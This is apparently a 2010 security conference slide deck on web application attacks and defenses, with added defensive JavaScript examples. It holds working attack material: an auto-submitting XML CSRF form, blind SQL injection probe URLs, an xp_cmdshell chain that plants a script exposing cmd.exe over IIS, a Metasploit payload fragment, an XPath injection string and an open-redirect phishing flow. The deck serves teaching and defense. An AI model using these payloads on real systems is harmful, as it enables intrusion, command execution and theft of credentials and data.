Session F3: Defending against the worst web-based application vulnerabilities of 2010
Date: Monday, 19 April 2010  Time: 3:45pm - 5pm
Shreeraj Shah, Founder and Director, Blueinfy; Author, Web 2.0 Security and Web Hacking: Attacks and Defense
Who Am I?
Founder & Director, Blueinfy Solutions Pvt. Ltd. (Brief); SecurityExposure.com
Past experience: Net Square, Chase, IBM & Foundstone
Interest: Web security research
Published research: Articles / Papers – SecurityFocus, O'Reilly, DevX, InformIT etc. Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. Advisories – .Net, Java servers etc.
Books (Author): Web 2.0 Security – Defending Ajax, RIA and SOA; Hacking Web Services; Web Hacking
http://shreeraj.blogspot.com [email_address] http://www.blueinfy.com
2010 - WEB ATTACKS
Real Life Analysis and Cases
Accessing infrastructure through LDAP injection
Replicating a full financial database from one Blind SQL injection
Accessing other users' banking accounts through a logical business flaw
Client side control and hacking through CSRF and XSS
Results – Full control over web applications
Technology Trends
Web 2.0 – Ajax, Silverlight and Flex/Flash
Web Services and SOA
Cloud APIs and SaaS
Browser empowering – HTML 5 and several other features
Traditional stacks are evolving around frameworks
Past, Present and Future Cloud 2010 Focus
Major Overlap in Web Apps (diagram): Presentation Layer, Business Layer, Utility Layer, Data Access, Authentication, Communication etc.; Runtime, Platform, Operating System; Components – Server side Components, Client side Components (Browser)
Next Generation Apps
Site: pageflakes.com (SaaS)
Web 2.0 Start page
Mashup for various applications
Using .NET and Ajax technologies
Can access mails, news etc. from the same page
Various Widgets and modules
Next Generation Architecture (diagram): Browser – HTML / JS / DOM, RIA (Flash), Ajax; Internet; Web 2.0 Start – Database, Authentication, Application Infrastructure, Web Services End point; Internet – Blog, Mails, News, Documents, Weather, Bank/Trade, RSS feeds
OWASP & WASC/TC
Vulnerability distribution WASC Stats.
CLIENT SIDE ATTACKS
Client Side Vulnerabilities
V1 - XSS (DOM, Mashup, Widget, RSS feeds etc.)
V2 - CSRF (XML)
V3 - Redirects and Forwards (Phishing and Trust break)
V1 - Distributed DOM driven XSS (diagram labels): Web Server, DB, Web app, attacker, Web app proxy, Web Client, 8008, XML/JSON/JS-Obj Stream, eval(), XSS
DOM Exploit Points
document.write(…), document.writeln(…), document.body.innerHTML=…, document.forms[0].action=…, document.attachEvent(…), document.create…(…), document.execCommand(…), document.body.…, window.attachEvent(…), document.location=…, document.location.hostname=…, document.location.replace(…), document.location.assign(…), document.URL=…, window.navigate(…)
Exploiting RSS feeds
RSS feeds consume un-trusted sources. Feed readers are a common component and are vulnerable to DOM driven XSS. Malicious code injection and attacking the browser.
Mashup Exploits
API exposure for Mashup applications. Building applications with APIs. Cross Domain access by callback may cause a security breach. Extensive DOM leverage – inject and exploit.
Widgets/Gadgets Exploits
The DOM sharing model can cause many security issues. One widget can change information on another widget. CSRF injection through widget code. Event hijacking is possible – common DOM.
Defense
Input validation and encoding
JavaScript – source code analysis
Widget – DOM sharing issue
Information validation and trusted source consumption
XSS protection and Cross Domain Blocking
V2 - Cross Site Request Forgery (CSRF)
Next Generation CSRF: is it possible to do CSRF to an XML stream? How? It will be a POST hitting the XML processing resources like Web Services. JSON CSRF is also possible. An interesting check to make against applications and Web 2.0 resources.
One Way CSRF Scenario
One-Way CSRF
One-Way CSRF
<html>
<body>
<FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST">
<input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>' >
</FORM>
<script>document.buy.submit();</script>
</body>
</html>
Forcing XML
Splitting the XML stream in the form. Possible through XForms as well. A similar technique is applicable to JSON as well.
Defense
Server Side Checks: check the client's content-type. XHR calls – application/xml; native calls – text/html. Filtering is possible on it.
Client Side Checks: the stream can be started and terminated by /* or any predefined characters. The client can remove them before injecting into the DOM.
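As an added example (not from the slides), the server-side and client-side checks from this slide in JavaScript. It assumes a Node.js-style lower-cased header map on the server and the /* */ guard named above around the JSON stream; the sample stream is constructed.

```javascript
// --- Server side -----------------------------------------------------------
// Content types a plain HTML form can produce without script-level access.
// The one-way CSRF form on the earlier slide uses ENCTYPE="text/plain" to
// smuggle an XML-RPC body; a form cannot send application/xml or
// application/json, so those are the only types accepted on stream endpoints.
const FORM_ONLY_TYPES = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);
const ALLOWED_XHR_TYPES = new Set(['application/xml', 'text/xml', 'application/json']);

// Returns {ok: true} for a request that a legitimate XHR client would send to
// an XML/JSON endpoint, or {ok: false, reason} for anything a form can forge.
function checkStreamRequest(headers) {
  const raw = (headers['content-type'] || '').split(';')[0].trim().toLowerCase();
  if (!raw) return { ok: false, reason: 'missing content-type' };
  if (FORM_ONLY_TYPES.has(raw)) return { ok: false, reason: `form content-type ${raw}` };
  if (!ALLOWED_XHR_TYPES.has(raw)) return { ok: false, reason: `unexpected content-type ${raw}` };
  return { ok: true };
}

// --- Client side -----------------------------------------------------------
// The server wraps its JSON in /* ... */ so that a cross-origin <script src>
// inclusion yields only a comment. The client verifies and strips the guard,
// then uses JSON.parse, never eval(), on the body.
function parseGuardedStream(body) {
  const m = /^\s*\/\*([\s\S]*)\*\/\s*$/.exec(body);
  if (!m) throw new Error('stream is missing the /* */ guard');
  return JSON.parse(m[1]);
}

// Encode untrusted text before it reaches document.write / innerHTML.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Turns a guarded feed stream into markup that is safe to assign to innerHTML.
function renderFeed(body) {
  const items = parseGuardedStream(body);
  return items.map((it) => `<li>${encodeHtml(it.title)}</li>`).join('');
}

// Constructed sample stream: one normal title and one XSS attempt.
const SAMPLE_STREAM =
  '/*[{"title":"Market open"},{"title":"<script>alert(1)</script>"}]*/';
```

The content-type check complements a per-request anti-CSRF token rather than replacing it.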
V3 – Redirects and Forward issues
As part of the root cause, there must be a redirect hole. Example: http://foo.bank.com/login.aspx?user=xxx&page=trade.aspx. Here "page" is a vulnerable parameter. What if someone puts page=http://yahoo.com …
Attack Anatomy
Detection: the attacker sends http://foo.bank.com/login.aspx?user=xxx&page=http://yahoo.com to foo.bank.com and gets a redirect or JavaScript call for loading yahoo.com. Vulnerability detected!!!
Threat:
1. Link in mail: the bank's user clicks the link on foo.bank.com and gets a redirect response to 203.88.XX.XX (attacker's area) – a trusted evil redirect.
2. 203.88.XX.XX sends a dummy form to the bank's user.
3. The bank's user sends username and password to 203.88.XX.XX, which sends a dummy response (Thanks!).
4. The attacker logs in to foo.bank.com and does a money transfer.
Defense
Need to validate parameters before passing them to redirect calls on the server side. Filtering http:// or https://. Do not pass values to a JavaScript redirect before filtering or validating. Deployment level redirects should not rely on HTTP parameters coming from the user. Check the referrer on important forms.
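An added example (not from the slides) of validating the "page" parameter from http://foo.bank.com/login.aspx?user=xxx&page=trade.aspx before redirecting. It goes beyond the slide's "filter http:// or https://" by also rejecting the other ways a value can leave the site (protocol-relative //, backslashes, other schemes, percent-encoded separators) and by accepting only known local pages; the allow list and host name are assumed.

```javascript
// Pages the login flow may forward to (assumed application list).
const ALLOWED_PAGES = new Set(['trade.aspx', 'account.aspx', 'portfolio.aspx']);
const DEFAULT_PAGE = 'trade.aspx';

// Returns the page to redirect to, falling back to DEFAULT_PAGE whenever the
// supplied value is not a plain, allow-listed local page name.
function safeRedirectTarget(page) {
  if (typeof page !== 'string' || page === '') return DEFAULT_PAGE;
  let decoded;
  try {
    decoded = decodeURIComponent(page);   // normalise %2F, %5C, %3A and friends
  } catch (e) {
    return DEFAULT_PAGE;                  // malformed percent-encoding
  }
  // A scheme separator, slash or backslash means this is not a page name:
  // "http://yahoo.com", "//yahoo.com" and "/\yahoo.com" all fail here.
  if (/[:\/\\]/.test(decoded)) return DEFAULT_PAGE;
  // Drop any query/fragment and compare case-insensitively with the allow list.
  const name = decoded.split(/[?#]/)[0].toLowerCase();
  return ALLOWED_PAGES.has(name) ? name : DEFAULT_PAGE;
}

// For places that must accept a full URL: resolve it against the site's own
// origin and keep it only if the parser agrees it stays on this https host.
// The WHATWG parser treats "\" like "/" and "//host" as an authority, so the
// usual bypasses end up with a foreign host and are rejected.
function isSameSiteUrl(value, host) {
  let u;
  try {
    u = new URL(value, `https://${host}/`);
  } catch (e) {
    return false;
  }
  return u.protocol === 'https:' && u.host === host;
}
```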
SERVER SIDE ATTACKS
Server Side Vulnerabilities
V4 - Advanced SQL injection (Blind/XML/JSON)
V5 – XPATH Injection
V6 – Reverse Engineering
V7 – Logical Attacks
V8 – WSDL discovery
V9 – SOAP faultcode leakage
V10 – SOAP injections
V4 - Advanced SQL injections
SQL injection over JSON streams. Flash based points. XML data access layer exposure. Errors are not standard (500 vs 200) and messages are embedded in the stream.
Blind SQL Injection
We have a SQL injection point but it is not throwing any error message as part of its response. The application sends a customized error page which does not reveal any signature by which we can deduce a potential SQL flaw.
Knowing the SQL injection point or loophole in the web application, xp_cmdshell seems to be working. But we can't say whether it is working or not since it doesn't return any meaningful signature. This is "blind xp_cmdshell".
The firewall doesn't allow outbound traffic, so we can't do ftp, tftp, ping etc. from the box to the Internet to confirm execution of the command on the target system.
We don't know the actual path to the webroot, so we can't copy a file to a location which can be accessed over HTTP or HTTPS later to confirm execution of the command.
If we know the path to the webroot and the directory structure but can't find execute permission on it, we can't copy cmd.exe or any other binary and execute it over HTTP/HTTPS.
Checks…
AND 1=1
DBO check: http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()='dbo'
Wait delay call: http://192.168.50.50/details.aspx?id=1;waitfor+delay+'0:0:10'
(SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115
http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114
http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),2,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97
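From the defender's side, the probes on this slide leave a recognisable trail in the web server log. This added example (not from the slides) runs detection rules for each probe type over constructed W3C extended log lines; the log format, field order and client IP are assumed.

```javascript
// Each rule is applied to the URL-decoded, lower-cased query string. The '+'
// in the slide's URLs is form-encoding for a space, so it is decoded first.
const RULES = [
  { name: 'boolean tautology',      re: /\band\s+\d+\s*=\s*\d+\b/ },
  { name: 'user_name() probe',      re: /user_name\(\)/ },
  { name: 'time-based delay',       re: /waitfor\s+delay\s+'/ },
  { name: 'sysprocesses char walk', re: /ascii\(substring\(.*sysprocesses/ },
  { name: 'xp_cmdshell',            re: /xp_cmdshell/ },
];

// Decode a query string the way the server will see it: '+' becomes a space,
// then percent-decoding; a malformed encoding is kept as-is, not dropped.
function decodeQuery(q) {
  const plusFixed = q.replace(/\+/g, ' ');
  try {
    return decodeURIComponent(plusFixed).toLowerCase();
  } catch (e) {
    return plusFixed.toLowerCase();
  }
}

// Parses one W3C extended log line with the assumed field order:
// date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
function parseLogLine(line) {
  const [date, time, ip, method, stem, query, status] = line.trim().split(/\s+/);
  return { date, time, ip, method, stem, query: query === '-' ? '' : query, status };
}

// Returns the names of the rules that matched; empty for a clean request.
function matchRules(query) {
  const q = decodeQuery(query);
  return RULES.filter((r) => r.re.test(q)).map((r) => r.name);
}

// Scans log lines and returns one finding per suspicious request.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    if (!line || line.startsWith('#')) continue;   // skip W3C directive lines
    const rec = parseLogLine(line);
    const hits = matchRules(rec.query);
    if (hits.length) findings.push({ ip: rec.ip, stem: rec.stem, status: rec.status, hits });
  }
  return findings;
}

// Constructed sample log: the slide's probes interleaved with a normal request.
const SAMPLE_LOG = [
  '#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status',
  '2010-04-19 18:47:58 10.0.0.7 GET /details.aspx id=1 200',
  "2010-04-19 18:47:59 10.0.0.7 GET /details.aspx id=1+AND+USER_NAME()='dbo' 200",
  "2010-04-19 18:48:00 10.0.0.7 GET /details.aspx id=1;waitfor+delay+'0:0:10' 200",
  '2010-04-19 18:48:01 10.0.0.7 GET /details.aspx id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115 200',
];
```

Note that every probe returns 200, so status-code alerting alone misses all of them; the signal is in the query string.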
Running tools
SQL Map or Absinthe
D:\tools\sqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:47:58
[18:48:00] [WARNING] the remote DMBS is not MySQL
[18:48:00] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---
[*] shutting down at: 18:48:14
Exploiting
Set WshShell = WScript.CreateObject("WScript.Shell")
Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")
windir = ObjExec.StdOut.ReadLine()
Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")
Set Dir = Root.Create("IIsWebVirtualDir", "secret")
Dir.Path = windir
Dir.AccessExecute = True
Dir.SetInfo

http://target/details.asp?id=1;exec+master..xp_cmdshell+'echo Set WshShell = WScript.CreateObject("WScript.Shell") > c:\secret.vbs'
… .. … .. … ..
http://target/details.asp?id=1;exec+master..xp_cmdshell+'echo Dir.SetInfo >> c:\secret.vbs'
http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:\secret.vbs'
Get the cmd.exe Run command over HTTP/HTTPS http://target/secret/system32/cmd.exe?+/c+set
Metasploit
…
sub Exploit {
  my $self = shift;
  my $target_host = $self->GetVar('RHOST');
  my $target_port = $self->GetVar('RPORT');
  my $path = $self->GetVar('RPATH');
  my $vhost = $self->GetVar('VHOST');
  my @url = split(/#/, $path);
  my @payload = (
    "EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject(\"WScript.Shell\")>c:\\secret.vbs'",
    "EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject(\"IIS://LocalHost/W3SVC/1/ROOT\")>>c:\\secret.vbs'",
    "EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create(\"IIsWebVirtualDir\",\"secret\")>>c:\\secret.vbs'",
    "EXEC+master..xp_cmdshell+'echo+Dir.Path+=+\"c:\\winnt\\system32\">>c:\\secret.vbs'",
    "EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:\\secret.vbs'",
    "EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:\\secret.vbs'",
    "EXEC+master..xp_cmdshell+'cscript+c:\\secret.vbs'"
  );
  $self->PrintLine("[+] Sending SQL injection payload...");
  for(my $count=0;$count<=6;$count++)
  ..
V5 - XPATH injection
XPATH parsing standard error. XPATH is a method available for XML parsing. MS SQL Server provides an interface and one can get table content in XML format. Once this is fetched one can run XPATH queries and obtain results. What if username/password parsing is done using XPATH – XPATH injection.
XPATH injection
using System.Xml;
using Microsoft.Data.SqlXml;

string fulltext = "";
string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass";
SqlXmlCommand co = new SqlXmlCommand(coString);
co.RootTag = "Credential";
co.CommandType = SqlXmlCommandType.Sql;
co.CommandText = "SELECT * FROM users for xml Auto";
XmlReader xr = co.ExecuteXmlReader();
xr.MoveToContent();
fulltext = xr.ReadOuterXml();
XmlDocument doc = new XmlDocument();
doc.LoadXml(fulltext);
// user and pass come straight from the request and are concatenated into the query
string credential = "//users[@username='" + user + "' and @password='" + pass + "']";
XmlNodeList xmln = doc.SelectNodes(credential);
if (xmln.Count > 0) {
    // true: a matching node was found
} else {
    // false
}
XPATH injection
string credential = "//users[@username='" + user + "' and @password='" + pass + "']";
XPATH parsing can be leveraged by passing the following string: ' or 1=1 or ''='
This will always be true on the first node and the user gets access as whoever the first user is. Bingo!
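The fix is to stop concatenating user text into the expression. This added example (not from the slides) rebuilds the credential query above with properly quoted XPath string literals so that the ' or 1=1 or ''=' payload stays inside a literal; it is pure string handling and needs no XPath engine. The function names are the example's own.

```javascript
// XPath 1.0 has no escape character inside string literals. A value holding
// only one kind of quote is wrapped in the other kind; a value holding both is
// split on the single quote and reassembled with concat(), the standard idiom.
function xpathLiteral(value) {
  const s = String(value);
  if (!s.includes("'")) return `'${s}'`;
  if (!s.includes('"')) return `"${s}"`;
  const parts = s.split("'").map((p) => `'${p}'`);
  return 'concat(' + parts.join(', "\'", ') + ')';
}

// Hardened counterpart of the slide's query: both comparison operands are
// literals, so user-supplied text cannot add predicates or close the bracket.
function credentialQuery(user, pass) {
  return `//users[@username=${xpathLiteral(user)} and @password=${xpathLiteral(pass)}]`;
}

// The slide's vulnerable concatenation, kept only to show the difference.
function credentialQueryUnsafe(user, pass) {
  return `//users[@username='${user}' and @password='${pass}']`;
}
```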
V6 - Reverse Engineering
It is possible to reverse engineer RIA apps. Attacking Flash and Silverlight components. Identifying hidden treasure and business logic. Crafting attacks based on enumerated information.
V7 - Logical Attacks
Exploiting application layer weakness with logical issues. Accessing unauthorized information. Analyzing code – JavaScript analysis and logical errors. Several key areas can be exploited. Debugging and Reverse Engineering help a lot.
V8 - WSDL Discovery Attacks
Search in the public domain. Tool – Search Engines. Look for wsdl, asmx, jws etc. Filetype and allinurl.
V9 - Fault code leakage with SOAP
The fault code of web services spits out a lot of information about internal workings. This attack can fetch internal paths, database interfaces etc. The fault code is part of the SOAP envelope and helps an attacker make logical deductions about assets.
V10 – SOAP injections (SQL)
SQL injection can be done using SOAP traffic. It is an innovative way of identifying database interface points. One can leverage xp_cmdshell via SOAP. The back end database can be compromised using this attack.
Defending
Input validation across streams – XML, JSON and Name-Value pairs. Do not put logic in client side components running in Flash and Silverlight. Extra attention and code review for logical attacks. WSDL and SOAP security around Web Services.
Key Controls
WAF for stream protection
Source Code Review during SDLC
Developers knowledge base
Secure API and Library usage across enterprise
Secure SDLC with various controls including threat modeling
Web 2.0 Attacks and Countermeasure strategies
CONCLUSION – QUESTIONS! [email_address] http://www.blueinfy.com


Web Attacks - Top threats - 2010


Editor's Notes

1. The famous web application setup diagram. Walk through each component and mention their roles. Web client – HTTP connections. Firewall – lets in only HTTP requests, and allows only outbound HTTP responses. Web server – handles all initial requests. Applications – run either on the web server, or on app servers. Database – SQL databases, and connection interfaces.